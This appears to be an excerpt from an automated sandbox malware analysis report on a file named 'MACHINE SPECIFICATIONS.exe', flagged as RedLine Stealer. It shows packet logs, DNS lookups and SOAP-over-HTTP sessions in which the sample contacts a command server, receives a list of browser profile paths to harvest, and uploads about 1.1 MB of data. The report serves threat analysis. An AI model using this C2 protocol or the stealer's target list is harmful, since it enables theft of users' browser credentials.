                                                                                  May 25, 2022 05:55:07.347647905 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.350018978 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.350049019 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.350075960 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.350105047 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.368614912 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.369823933 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.370019913 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.370063066 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.370294094 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.370625973 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.370739937 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.370821953 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.371140003 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.371243954 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.371411085 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.371439934 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.371670008 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.371810913 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.371895075 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.371968031 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.372169971 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.372260094 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.372708082 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.372980118 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.374146938 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.374258995 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.374349117 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.374439955 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.381448984 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.381524086 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.381562948 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.396523952 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.396575928 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.396955967 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.397093058 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.397206068 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.397299051 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.397514105 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.397600889 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.397746086 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.397835970 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.397978067 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.398056984 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.398205042 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.398509979 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.398617983 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.398747921 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.398834944 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.398979902 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.399045944 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.400803089 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.400886059 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.401175976 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.401468039 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.401588917 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.401640892 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.401717901 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.401917934 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.401997089 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.423573971 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.423693895 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.423831940 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.423883915 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.423914909 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.423984051 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.424000978 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.424146891 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.424381018 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.424719095 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.424839020 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.425009966 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.425095081 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.425241947 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.425333023 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.425477028 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.425563097 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.425708055 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.425770044 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.427211046 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.427706003 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.427803993 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.427977085 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.428071976 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.428289890 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.428380966 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.428504944 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.428615093 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.428740025 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.428968906 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.429090977 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.450289011 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.450342894 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.450547934 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.450579882 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.450810909 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.450939894 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.451131105 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.451323032 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.451565981 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.451690912 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.451894045 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.451970100 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.452008009 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.452091932 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.452158928 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.452245951 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.452388048 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.452467918 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.453948975 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.454157114 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.454272985 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.454473019 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.454687119 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.455005884 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.455204964 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.455487967 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460839033 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460870028 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460895061 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460922003 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460948944 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.460973978 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.476948023 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.477163076 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.477402925 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.477428913 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.477888107 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.478163004 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.478442907 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.478645086 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.478921890 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.479202032 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.479481936 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.480407953 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.480628967 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.489039898 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.489068031 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.489087105 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.489104033 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.514468908 CEST1791049750185.222.58.90192.168.2.3
                                                                                  May 25, 2022 05:55:07.610975027 CEST4975017910192.168.2.3185.222.58.90
                                                                                  May 25, 2022 05:55:07.870074987 CEST4975017910192.168.2.3185.222.58.90

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 25, 2022 05:54:43.152170897 CEST5122953192.168.2.38.8.8.8
                                                                                  May 25, 2022 05:54:43.197985888 CEST6485153192.168.2.38.8.8.8

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  May 25, 2022 05:54:43.152170897 CEST192.168.2.38.8.8.80xee6bStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                  May 25, 2022 05:54:43.197985888 CEST192.168.2.38.8.8.80xac5cStandard query (0)api.ip.sbA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  May 25, 2022 05:54:43.178622961 CEST8.8.8.8192.168.2.30xee6bNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                  May 25, 2022 05:54:43.224001884 CEST8.8.8.8192.168.2.30xac5cNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • 185.222.58.90:17910

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.349739185.222.58.9017910C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 25, 2022 05:54:35.038233042 CEST1143OUTPOST / HTTP/1.1
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                  Host: 185.222.58.90:17910
                                                                                  Content-Length: 137
                                                                                  Expect: 100-continue
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Connection: Keep-Alive
                                                                                  May 25, 2022 05:54:35.386113882 CEST1143INHTTP/1.1 100 Continue
                                                                                  May 25, 2022 05:54:35.616060972 CEST1144INHTTP/1.1 200 OK
                                                                                  Content-Length: 212
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 25 May 2022 01:54:35 GMT
                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                  May 25, 2022 05:54:42.240025043 CEST1217OUTPOST / HTTP/1.1
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                  Host: 185.222.58.90:17910
                                                                                  Content-Length: 144
                                                                                  Expect: 100-continue
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  May 25, 2022 05:54:42.592434883 CEST1217INHTTP/1.1 100 Continue
                                                                                  May 25, 2022 05:54:42.723193884 CEST1218INHTTP/1.1 200 OK
                                                                                  Content-Length: 4744
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 25 May 2022 01:54:42 GMT
                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e
                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.349750185.222.58.9017910C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 25, 2022 05:55:06.701167107 CEST1250OUTPOST / HTTP/1.1
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                  Host: 185.222.58.90:17910
                                                                                  Content-Length: 1133614
                                                                                  Expect: 100-continue
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  May 25, 2022 05:55:06.728950977 CEST1250INHTTP/1.1 100 Continue
                                                                                  May 25, 2022 05:55:07.136980057 CEST2441INHTTP/1.1 200 OK
                                                                                  Content-Length: 147
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 25 May 2022 01:55:06 GMT
                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                  May 25, 2022 05:55:07.140512943 CEST2441OUTPOST / HTTP/1.1
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                  Host: 185.222.58.90:17910
                                                                                  Content-Length: 1133606
                                                                                  Expect: 100-continue
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  May 25, 2022 05:55:07.180166006 CEST2441INHTTP/1.1 100 Continue
                                                                                  May 25, 2022 05:55:07.514468908 CEST3598INHTTP/1.1 200 OK
                                                                                  Content-Length: 261
                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Wed, 25 May 2022 01:55:06 GMT
                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:05:54:10
                                                                                  Start date:25/05/2022
                                                                                  Path:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
                                                                                  Imagebase:0xf80000
                                                                                  File size:1190912 bytes
                                                                                  MD5 hash:6A54566BF72BC5F07BAC04C982DAB3E6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
